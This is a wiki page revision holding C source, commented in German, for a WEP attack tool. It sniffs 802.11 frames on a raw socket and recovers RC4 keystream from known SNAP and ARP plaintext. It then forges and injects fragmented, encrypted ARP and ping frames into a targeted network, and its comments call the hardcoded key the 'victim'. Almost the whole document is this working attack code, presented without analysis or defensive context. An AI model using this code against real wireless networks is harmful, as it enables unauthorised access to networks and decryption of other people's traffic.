Arp and pingforwarding.c

From
Revision as of 10:35, 31 October 2006 by Grauel (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#include <string.h>
#include <netinet/in.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include "rc4.h"

#define SEND_BIT 28 //0x24(verschluesselt) <> 0x1c(unverschluesselt)
#define crypt1  
#define DEBUG
#define KEY_LAENGE 64 //Bit

  #define TMAC0 0x00
  #define TMAC1 0x0f
  #define TMAC2 0xb5
  #define TMAC3 0x3f
  #define TMAC4 0x13
  #define TMAC5 0x14
#if 0
  #define TMAC0 0x00
  #define TMAC1 0x11
  #define TMAC2 0x88
  #define TMAC3 0x28
  #define TMAC4 0x73
  #define TMAC5 0x30
#endif
#if 0
  #define MAC0 0x00
  #define MAC1 0x13
  #define MAC2 0x02
  #define MAC3 0x2a
  #define MAC4 0x80
  #define MAC5 0x8d
#endif
//0x00, 0x0F, 0xb5, 0x97, 0x37, 0x37, //source

  #define MAC0 0x00
  #define MAC1 0x0f
  #define MAC2 0xb5
  #define MAC3 0x97
  #define MAC4 0x37
  #define MAC5 0x37

   typedef struct { 
	int iv; 
	unsigned char keyindex; 
	unsigned char keystream[2400];
  } key;  

int rawsock;

extern int crc32_bitoriented(unsigned char *buffer, int length);
extern void swap_byte(unsigned char *a, unsigned char *b);
extern void prepare_key(unsigned char *key_data_ptr, int key_data_len, rc4_key *key);
extern void rc4(unsigned char*buffer_ptr, int buffer_len, rc4_key *key);
unsigned short chksum(unsigned char *data, int l);

void filter(int min_len);
void decrypt_arp(unsigned char packet[], int n);
void decrypt_ping(unsigned char packet[], int n);

	unsigned char nul[1337] = {0};
	unsigned char arp[] = {
		0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06,//LLC/SNAP
		0x00, 0x01, //type ethernet
		0x08, 0x00, //proto-type
		0x06, 0x04, 0x00, 0x01, //hw, opcode
		0x00, 0x0f, 0xb5, 0x97, 0x37, 0x37, //source-mac
		0xc0, 0xa8, 0x8e, 0x02, //source IP NEEDS PATCH 0x16-0x19 XXX last byte= 64
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //target-mac
		0xc0, 0xa8, 0x8e, 0x01 //target-ip
	};

	unsigned char ping[]={
	0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00, //SNAP _7
	0x45, 0x00, 0x01, 0x1c, // ipheader,flags, 2bit:laenge _11
	0x00, 0x00, // Identification _13
	0x40, //flags _14
	0x00, //fragmen offset _15
	0x40, // TTL _16
	0x01, // Proto = ICMP _17
	0x9c, 0x8c, // FIXME CHKSUM _19
	0xc0, 0xa8, 0x8e, 0x02, //SRC IP _23
	0xc0, 0xa8, 0x8e, 0x01, //DEST IP (TARGET) _27
	0x08, //ICMP type echo request
	0x00, //code _29
	0x07, 0xd5, //icmp-chksum FIXME TODO XXX _31
	0x08, 0x20, //identifier _33
	0x00, 0x02, //sequenz _35
	0x40, 0xe5, 0x18, 0x45, 0x2f, 0x37, 0x0a, 0x00, //statische daten
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff // _291
	};
	int ping_len = 292;


	uint8_t arp_len = 36;

/* wandelt daten in hexzahlen um */ 
  void
hexdump (unsigned char *data, int len, int nl)
{
  int i;
  for (i = 0; i < len; i++)
    printf ("%02x%c", data[i], (i < len - 1) ? ':' : 0);
  if (nl)
  	printf ("\n");
}


/* header ausgeben */ 
  void
print_header (unsigned char packet[], int n) 
{
  printf ("\nType:\t%x", (unsigned char) packet[0]);
  printf ("\nFlags:\t%x", (unsigned char) packet[1]);
  printf ("\nDauer:\t%u", (unsigned short) packet[2]);
  printf ("\nZiel-Mac:\t");
  hexdump ((unsigned char *) packet + 0x04, 6, 0);
  printf ("\nBSS-Mac:\t");
  hexdump ((unsigned char *) packet + 0x0a, 6, 0);
  printf ("\nQuell-Mac:\t");
  hexdump ((unsigned char *) packet + 0x10, 6, 0);
  printf ("\nSequenzNR:\t%u", (unsigned short) packet[0x16]);
  printf ("\n##IV##:\t%x %x %x", (unsigned char) packet[0x18],
	   (unsigned char) packet[0x19], (unsigned char) packet[0x1a]);
  printf ("\nKey-Index:\t%u\n", (unsigned char) packet[0x1b]);
  hexdump ((unsigned char *) packet + 0x1c, n - 3 - 0x1c, 1);
  printf ("WEP-ICV:\t");
  hexdump ((unsigned char *) packet + n - 3, 4, 1);
  return;
}

unsigned char * get_bss(char packet[], int n)
{
	return (unsigned char*)packet + + 10;
}
/*
uint32_t modpot(uint32_t a, uint8_t e, uint8_t m)
{
	uint32_t z, i;
	z = 1;
	for (i = ;
	
}*/

void send_arp(unsigned char packet[], uint8_t iv[], uint8_t kv[], uint8_t key_idx)
{
	unsigned char arp_enc[] = {
		0x08, //Data
		//org0x45, //flags: enc, toDS, frag (FRAGS needs to be cleared for last package)
		0x00,
		0x00, 0x00, //duration-field
		TMAC0, TMAC1, TMAC2, TMAC3, TMAC4, TMAC5, //BSS
		0x00, 0x0F, 0xb5, 0x97, 0x37, 0x37, //source
		0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //dest (broadcast)
		0xff, 0xff, //sequence NEEDS PATCH 0x16-0x17
		0xff, 0xff, 0xff, //IV NEEDS PATCH 0x18-0x1a
		0xff, //key_idx NEEDS PATCH 0x1b
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload NEEDS PATCH 0x1c-0x23
		0xff, 0xff, 0xff, 0xff //package-checksum NEEDS PATCH 0x24-0x27
	};
	//uint8_t arp_enc_len = 0x28;
	uint32_t ivc, packsum;
	int i, nr;
	unsigned int sequenz;

	sequenz = (packet[17]);
	sequenz = (sequenz<<4)+(packet[16]&0xf);
	
	sequenz += 42;
	ivc = 0;
	//fuer alle fragmente:
	for(nr=0;nr < (int)arp_len/4; nr++)
	{	
#ifdef crypt1	
	arp_enc[0x01] = (nr==(int)(arp_len/4-1))?0x41+0x08:0x45+0x08;
#else
	arp_enc[0x01] = (nr==(int)(arp_len/4-1))?0x09:0xd;
	printf("runde: %d\tschalter: %x\n", nr, arp_enc[0x01]);
#endif
		//arp_enc[0x01] = (nr==(int)(arp_len/4-1))?0x01+0x08:0x05+0x08;

		//build sequence-field
		/* fragment 4 bit - squenz 12 bit */
		//sequenz++;
		//arp_enc[0x17] = packet[0x17]+(nr%16)?0:1;
		arp_enc[0x17] = (unsigned char)sequenz>>4; //die 8 hoechstwertigen bits
		arp_enc[0x16] = ((nr%16))|(unsigned char)((sequenz)<<4); //fragment-nr-4bit|sequenz-nr-4bit
		//printf("sequenz=%u\n",sequenz);
#ifdef crypt1
		//set IV
		arp_enc[0x18] = packet[0x18];
		arp_enc[0x19] = packet[0x19];
		arp_enc[0x1a] = packet[0x1a];
		//set keyidx
		arp_enc[0x1b] = key_idx;
#endif

#ifdef crypt1
		//packet fuellen - verschluesselt
		arp_enc[0x1c] = arp[0+(nr*4)];
		arp_enc[0x1d] = arp[1+(nr*4)];
		arp_enc[0x1e] = arp[2+(nr*4)];
		arp_enc[0x1f] = arp[3+(nr*4)];
#else
		//packet fuellen - unverschluesselt
	printf("packet unverschluesselt fuellen\n");
		arp_enc[0x18] = arp[0+(nr*4)];
		arp_enc[0x19] = arp[1+(nr*4)];
		arp_enc[0x1a] = arp[2+(nr*4)];
		arp_enc[0x1b] = arp[3+(nr*4)];
#endif

#if 0
		arp_enc[0x18] = arp[0+(nr*4)];
		arp_enc[0x19] = arp[1+(nr*4)];
		arp_enc[0x1a] = arp[2+(nr*4)];
		arp_enc[0x1b] = arp[3+(nr*4)];
#endif
#ifdef crypt1
		//build icv-checksum over packet
		ivc = crc32_bitoriented((arp+(nr*4)), 4);
    	printf("crc : %X %X %X %X ist %8X\n", arp[0+(4*nr)], arp[1+(4*nr)], arp[2+(4*nr)], arp[3+(4*nr)], ivc);
		//build packet
		arp_enc[0x20] = *(((uint8_t *)&ivc)+0);
		arp_enc[0x21] = *(((uint8_t *)&ivc)+1);
		arp_enc[0x22] = *(((uint8_t *)&ivc)+2);
		arp_enc[0x23] = *(((uint8_t *)&ivc)+3);
#endif
#ifdef crypt1
		printf("unverschluesselt:"); hexdump((unsigned char *) arp_enc + 0x1c,8,1);
		//verschluesseln	
		for(i=0;i<8;i++)
		{
			arp_enc[0x1c + i] ^= kv[i];
		}
#endif

#ifdef crypt1	
		printf("verschluesselter datenteil:\t"); hexdump((unsigned char *)arp_enc + 0x1c,8,1);
#else 
		printf("verschluesselter datenteil:\t"); hexdump((unsigned char *)arp_enc + 0x18,8,1);
#endif


		//checksumme des packetes bilden
		packsum = crc32_bitoriented(arp_enc,36);
#ifdef crypt1
		arp_enc[0x24] = *(((uint8_t *)&packsum)+0);
		arp_enc[0x25] = *(((uint8_t *)&packsum)+1);
		arp_enc[0x26] = *(((uint8_t *)&packsum)+2);
		arp_enc[0x27] = *(((uint8_t *)&packsum)+3);
#else
		arp_enc[0x1c] = *(((uint8_t *)&packsum)+0);
		arp_enc[0x1d] = *(((uint8_t *)&packsum)+1);
		arp_enc[0x1e] = *(((uint8_t *)&packsum)+2);
		arp_enc[0x1f] = *(((uint8_t *)&packsum)+3);
#endif

#ifdef crypt1
		for(i=0;i<0x24;i++)printf("%x ",arp_enc[i]);
	printf("\n");	
		while(write(rawsock, arp_enc,0x24)!=0x24) ;
#else
		for(i=0;i<SEND_BIT;i++)printf("%x ",arp_enc[i]);		
		printf("\n");
	
		while(write(rawsock, arp_enc,SEND_BIT)!=SEND_BIT) ;
#endif

	//	printf("%d. runde vollendet:", nr);getc(stdin);
	}
	filter(0);
}

/*debug*/
void filter(int min)
{
	int n;
	unsigned char packet[2400];
	int packetsize = 2400;
printf("FILTER SUCHT PASSENDES PACKET\n\n");
while(1){
      n = read (rawsock, packet, packetsize);
	  /* wenn das netz eine bestimmt mac hat: packet+0x0a*/

      if (//(packet[0] == 0x08) &&
			(n > min) &&
				((TMAC0==(unsigned char)packet[10]) &&
				  (TMAC1==(unsigned char)packet[11]) &&	
				  (TMAC2==(unsigned char)packet[12]) &&	
				  (TMAC3==(unsigned char)packet[13]) &&	
				  (TMAC4==(unsigned char)packet[14]) &&	
				  (TMAC5==(unsigned char)packet[15])) 
			&&
					(((MAC0==(unsigned char)packet[4]) &&
				  	(MAC1==(unsigned char)packet[5]) &&	
				  	(MAC2==(unsigned char)packet[6]) &&	
				  	(MAC3==(unsigned char)packet[7]) &&	
				  	(MAC4==(unsigned char)packet[8]) &&	
				  	(MAC5==(unsigned char)packet[9]))
				||
					((MAC0==(unsigned char)packet[16]) &&
				  	(MAC1==(unsigned char)packet[17]) &&	
				  	(MAC2==(unsigned char)packet[18]) &&	
				  	(MAC3==(unsigned char)packet[19]) &&	
				  	(MAC4==(unsigned char)packet[20]) &&	
				  	(MAC5==(unsigned char)packet[21])))
		)
	  {	
 		printf("!!GOT RESPONSE!!\n");	
		print_header (packet, n);

		hexdump(packet,n,1);
		
		getc(stdin);getc(stdin);
#ifdef crypt1
		if(n>200) decrypt_ping(packet, n);
		decrypt_arp(packet, n);
#endif
		return;
	  }
}
}

void send_ping(unsigned char packet[], unsigned char kv[], int n)
{
	unsigned char ping_header[]={
		0x08, //Data
		//org0x45, //flags: enc, toDS, frag (FRAGS needs to be cleared for last package)
		0x00,
		0x00, 0x00, //duration-field
		TMAC0, TMAC1, TMAC2, TMAC3, TMAC4, TMAC5, //BSS
		0x00, 0x0F, 0xb5, 0x97, 0x37, 0x37, //source
		//TMAC0, TMAC1, TMAC2, TMAC3, TMAC4, TMAC5, //BSS
		0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //dest
		0xff, 0xff, //sequence NEEDS PATCH 0x16-0x17
		0xff, 0xff, 0xff, //IV NEEDS PATCH 0x18-0x1a
		0xff, //key_idx NEEDS PATCH 0x1b
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload 
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload 
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload + icv
	};


		int nr;
	int i, ivc, sequenz;
	//hexdump(ping+27,264,1);
	//printf("checksum vom ping-ding:\t%x\n", chksum(ping+27, 264)); 
	
	sequenz = (packet[17]);
	sequenz = (sequenz<<4)+(packet[16]&0xf);
	for(nr=0;nr < (int)ping_len/36; nr++)
	{	
	ping_header[0x01] = (nr==(int)(ping_len/36-1))?0x41+0x08:0x45+0x08;

		//build sequence-field
		/* fragment 4 bit - squenz 12 bit */
		//sequenz++;
		//arp_enc[0x17] = packet[0x17]+(nr%16)?0:1;
		ping_header[0x17] = (unsigned char)sequenz>>4; //die 8 hoechstwertigen bits
		ping_header[0x16] = ((nr%16))|(unsigned char)((sequenz)<<4); //fragment-nr-4bit|sequenz-nr-4bit

		//set IV
		ping_header[0x18] = packet[0x18];
		ping_header[0x19] = packet[0x19];
		ping_header[0x1a] = packet[0x1a];
		//set keyidx
		ping_header[0x1b] = packet[0x1b];

		//packet fuellen 
		for(i=0;i<36;i++) ping_header[0x1c + i] = ping[i+(nr*36)];
		
		//build icv-checksum over packet
		ivc = crc32_bitoriented((ping+(nr*36)), 36);
		//build packet
		ping_header[0x40] = *(((uint8_t *)&ivc)+0);
		ping_header[0x41] = *(((uint8_t *)&ivc)+1);
		ping_header[0x42] = *(((uint8_t *)&ivc)+2);
		ping_header[0x43] = *(((uint8_t *)&ivc)+3);

		for(i=0;i<0x44;i++) ping_header[0x1c+i]^=kv[i];

		//ausgeben des packets
		printf("AUSGEBEN DES PACKETES\n");
		for(i=0;i<0x44;i++)printf("%x ", ping_header[i]);
	
		//senden des packets
		while(write(rawsock, ping_header,0x44)!=0x44) ;
		printf("\nWURDE GESENDET\n");	
	}
		
	
	filter(200);	
	
}

unsigned short chksum(unsigned char *data, int l)
{
	int i;
	unsigned short sum = 0;
	
	for(i=0;i<l;i+=2){
		sum += (unsigned short)(((data[i]^0xff)<<8)+(data[i+1]^0xff));		
	}
	printf("%d\n",i);
	return sum;	
}

void decrypt_arp(unsigned char packet[], int n)
{	
	int i, packsum;
	unsigned char kv[2400];
	unsigned char nul[2400];
	unsigned char wep_key[]={0x00,0x00,0x00,0xf0,0x0b,0xaf,0x00,0xba}; //opfer
	rc4_key rc4_schluessel;
	unsigned char ivc[4];
#ifdef crypt1
	if(packet[0]==0xb0)printf("authentication frame found\n");
	//if(n!=86) {printf("kein arp-packet!!\n"); return;} //kein arp
#endif	
  	printf ("\n##IV##:\t%x %x %x\n", (unsigned char) packet[0x18], (unsigned char) packet[0x19], (unsigned char) packet[0x1a]);
	
	for(i=0;i<36;i++) { kv[i] = packet[0x1c+i]^arp[i];}  //36 Byte Schluessel aus bekanntem ARP erraten
	 			
		packsum = crc32_bitoriented(arp,36);
		ivc[3] = *(((uint8_t *)&packsum)+3);
		ivc[2] = *(((uint8_t *)&packsum)+2);
		ivc[1] = *(((uint8_t *)&packsum)+1);
		ivc[0] = *(((uint8_t *)&packsum)+0);

    	printf("crc vom arp ist %x %x %x %x\n", ivc[0], ivc[1], ivc[2], ivc[3]);
#ifdef crypt1
		/* i == 36 */
		i = 36;
		kv[i] = ivc[0]^packet[0x1c+i];i++;
		kv[i] = ivc[1]^packet[0x1c+i];i++;
		kv[i] = ivc[2]^packet[0x1c+i];i++;
		kv[i] = ivc[3]^packet[0x1c+i];i++;

		printf("berechneter Keystream:\n");
		for(i=0;i<40;i++) printf("%x ",kv[i]); 
		printf("\nRC4-Keystream\n");
		wep_key[0]=packet[0x18];
		wep_key[1]=packet[0x19];
		wep_key[2]=packet[0x1a];

		prepare_key(wep_key,8/* KEY_LAENGE*/, &rc4_schluessel);
		for(i=0;i<80;i++) nul[i]=0x00;
		rc4(nul,40,&rc4_schluessel);
		for(i=0;i<80;i++) printf("%x ",nul[i]); 

		for(i=0;i<40;i++) packet[28+i]^=kv[i]; 	// Vergleich mit erwarteten ARP-Packet
		printf("\nEntschluesseltes Packet:\n");
		for(i=0;i<68;i++) printf("%x ",packet[i]); 
		printf("\n");
		i = 40;
	/* ***************************************************** */
		send_ping(packet, kv, i);
	
#endif
	
}

void decrypt_ping(unsigned char packet[], int n)
{	
	int i, packsum;
	unsigned char kv[2400];
	unsigned char nul[2400];
	unsigned char wep_key[]={0x00,0x00,0x00,0xf0,0x0b,0xaf,0x00,0xba}; //opfer
	rc4_key rc4_schluessel;
	unsigned char ivc[4];
	
  	printf ("\nPING DECRYPT\n##IV##:\t%x %x %x\n", (unsigned char) packet[0x18], (unsigned char) packet[0x19], (unsigned char) packet[0x1a]);
	
	for(i=0;i<(n-(0x1c + 4));i++) { kv[i] = packet[0x1c+i]^ping[i];}  //n Byte Schluessel aus bekanntem ping erraten
	 			
		packsum = crc32_bitoriented(ping,ping_len);
		ivc[3] = *(((uint8_t *)&packsum)+3);
		ivc[2] = *(((uint8_t *)&packsum)+2);
		ivc[1] = *(((uint8_t *)&packsum)+1);
		ivc[0] = *(((uint8_t *)&packsum)+0);

    	printf("crc vom ping ist %x %x %x %x\n", ivc[0], ivc[1], ivc[2], ivc[3]);
		/* i == 36 */
		i = n - 4;
		kv[i] = ivc[0]^packet[0x1c+i];i++;
		kv[i] = ivc[1]^packet[0x1c+i];i++;
		kv[i] = ivc[2]^packet[0x1c+i];i++;
		kv[i] = ivc[3]^packet[0x1c+i];i++;

		printf("berechneter Keystream:\n");
		//for(i=0;i<(n-0x1c);i++) printf("%x ",kv[i]); 
		hexdump(kv,n-0x1c,1);
		printf("\nRC4-Keystream\n");
		wep_key[0]=packet[0x18];
		wep_key[1]=packet[0x19];
		wep_key[2]=packet[0x1a];

		prepare_key(wep_key,8/* KEY_LAENGE*/, &rc4_schluessel);
		for(i=0;i<(n-0x1c);i++) nul[i]=0x00;
		rc4(nul,n-0x1c,&rc4_schluessel);
		//for(i=0;i<(n-0x1c);i++) printf("%x ",nul[i]); 
		hexdump(nul,n-0x1c,1);

		for(i=0;i<(n-0x1c);i++) packet[28+i]^=kv[i]; 	// Vergleich mit erwarteten ARP-Packet
		printf("\nEntschluesseltes Packet:\n");
		//for(i=0;i<n;i++) printf("%x ",packet[i]); 
		hexdump(packet,n,1);
		printf("\n");
	
}

void
have_fun(unsigned char packet[], int n)
{
	unsigned char iv[3], key_idx, kv[8];
	char ask;
	int i = 0;
	rc4_key  rc4_schluessel;

	unsigned char wep_key[]={0x00,0x00,0x00,0xf0,0x0b,0xaf,0x00,0xba}; //opfer
//	unsigned char wep_key[]={0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef};

	//check if type is data
	if ((unsigned char) packet[0] != 0x08) return;
	printf("data-package received\n");
	//check if packet is encrypted
	//if (! (((unsigned char) packet[1]) & 0x40)) return;

#ifdef crypt1
	printf("IV: %X%X%X (KeyIdx: %x)\n", packet[24], packet[25], packet[26], packet[27]); 
	iv[0] = packet[24];
	iv[1] = packet[25];
	iv[2] = packet[26];
	key_idx = packet[27];

	wep_key[0]= iv[0];
	wep_key[1]=	iv[1];
	wep_key[2]= iv[2];
	printf("#DEBUG:\tWEP_KEY =\t"); 
	for(i=0;i<8;i++) printf("%x ", wep_key[i]);
#endif

	//building first 7 byte of keystream by cypherstream XOR SNAP
	//standard-SNAP: AA AA 03 00 00 00 08
	
	kv[0] = packet[28] ^ 0xaa;
	kv[1] = packet[29] ^ 0xaa;
	kv[2] = packet[30] ^ 0x03;
	kv[3] = packet[31] ^ 0x00;
	kv[4] = packet[32] ^ 0x00;
	kv[5] = packet[33] ^ 0x00;
	kv[6] = packet[34] ^ 0x00;
	
	//guess if it is ARP or IPv4 for 8th byte of key
	if (n == 86) { //ARP
		printf("Packet is propably ARP\n");
		kv[7] = packet[35] ^ 0x06;
	} else {//IPv4 or else
		printf("Packet is propably IPv4\n");
		kv[7] = packet[35] ^ 00;
	}
	kv[7]=0x27^packet[35];

#ifdef DEBUG
	printf("IV= %x %x %x (key_index=%u)\n", iv[0], iv[1],iv[2],key_idx);
	printf("First 8 Byte of Keystream: %X %X %X %X %X %X %X %X \n", kv[0], kv[1], kv[2], kv[3], kv[4], kv[5], kv[6], kv[7]);
	printf("starting RC4-PRNG\n");

	prepare_key(wep_key,8/* KEY_LAENGE*/, &rc4_schluessel);
	for(i=0;i<8;i++) nul[i]=0x00;
	rc4(nul,8, &rc4_schluessel);
	printf("Schluesselstrom=\t");
	for(i=0;i<8;i++) printf("%x\t", nul[i]);
	printf("\n(mit schluesselstrom) entschluesseltes packet:\n");
	for(i=0;i<8;i++) printf("%x\t", nul[i]^packet[28+i]);
	printf("\n");
#endif
	
//	printf("First 8 Byte of Keystream: %X %X %X %X %X %X %X %X \n", kv[0], kv[1], kv[2], kv[3], kv[4], kv[5], kv[6], kv[7]);
	printf("Proceed y/n? ");
	ask = getc(stdin);
	getc(stdin);

	if (ask == 'y') send_arp(packet, iv, kv, key_idx);
	return;
}


// Main Part
  int
main (int argc, char **argv) 
{
  int sock, uid, n, i;
  int packetsize = 2400;	//sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct tcphdr);
  unsigned char packet[packetsize];
  struct ifreq ifr;
  struct sockaddr_ll addr;
  
 
  i = 0; 
  if (argc != 2)
    {
      printf ("use ./sniff <dev>\n");
      return -1;
    }
  
    // Are you root?
    uid = getuid ();
  if (uid != 0)
    {
      printf ("You must have UID 0 instead of %d.\n", uid);
      exit (1);
    }
  
    // Raw Socket oeffnen
    
/*by biba */ 
    if ((sock = socket (PF_PACKET, SOCK_RAW, 0)) < 0)
    return -1;
  bzero (&ifr, sizeof (ifr));
  strcpy (ifr.ifr_name, argv[1]);
  if (ioctl (sock, SIOCGIFHWADDR, &ifr))
    {
     	close (sock);
      return -1;
    }
  if (ioctl (sock, SIOCGIFINDEX, &ifr))
    {
      close (sock);
      return -1;
    }
  close (sock);
  if ((sock = socket (PF_PACKET, SOCK_RAW, htons (0x3))) == -1)
    {
      perror ("socket");
      exit (1);
    }
  bzero (&addr, sizeof (addr));
  addr.sll_family = AF_PACKET;
  addr.sll_ifindex = ifr.ifr_ifindex;
  rawsock = sock;
  
#if 1
    if (bind (sock, (struct sockaddr *) &addr, sizeof (addr)) < 0)
    {
      close (sock);
      printf ("failed to bind device\n");
      return -23;
    }
  
#endif /*  */
/*************/ 
    
// if( (sock = socket(AF_INET,SOCK_PACKET,htons(0x3))) == -1) { perror("socket"); exit(1); }
    while (1)
    
    {
      n = read (sock, packet, packetsize);
	  /* wenn das netz eine bestimmt mac hat: packet+0x0a*/

      if (//(packet[0] == 0x08) &&
				((TMAC0==(unsigned char)packet[10]) &&
				  (TMAC1==(unsigned char)packet[11]) &&	
				  (TMAC2==(unsigned char)packet[12]) &&	
				  (TMAC3==(unsigned char)packet[13]) &&	
				  (TMAC4==(unsigned char)packet[14]) &&	
				  (TMAC5==(unsigned char)packet[15])) 
/*			&&
					(((MAC0==(unsigned char)packet[4]) &&
				  	(MAC1==(unsigned char)packet[5]) &&	
				  	(MAC2==(unsigned char)packet[6]) &&	
				  	(MAC3==(unsigned char)packet[7]) &&	
				  	(MAC4==(unsigned char)packet[8]) &&	
				  	(MAC5==(unsigned char)packet[9]))
				||
					((MAC0==(unsigned char)packet[16]) &&
				  	(MAC1==(unsigned char)packet[17]) &&	
				  	(MAC2==(unsigned char)packet[18]) &&	
				  	(MAC3==(unsigned char)packet[19]) &&	
				  	(MAC4==(unsigned char)packet[20]) &&	
				  	(MAC5==(unsigned char)packet[21])))*/
		)
	  	print_header (packet, n);

	  	have_fun(packet, n);
      
#if 0
	for (i = 0; i < n; i++)
	printf ("%x ", (unsigned char) packet[i]);
      printf ("%s:%d\t --> \t%s:%d \tSeq: %d \tAck: %d\n",
	       inet_ntoa (*(struct in_addr *) &ip->saddr),
	       ntohs (tcp->source),
	       inet_ntoa (*(struct in_addr *) &ip->daddr), ntohs (tcp->dest),
	       ntohl (tcp->seq), ntohl (tcp->ack_seq));
      
#endif /*  */
    } return 0;
}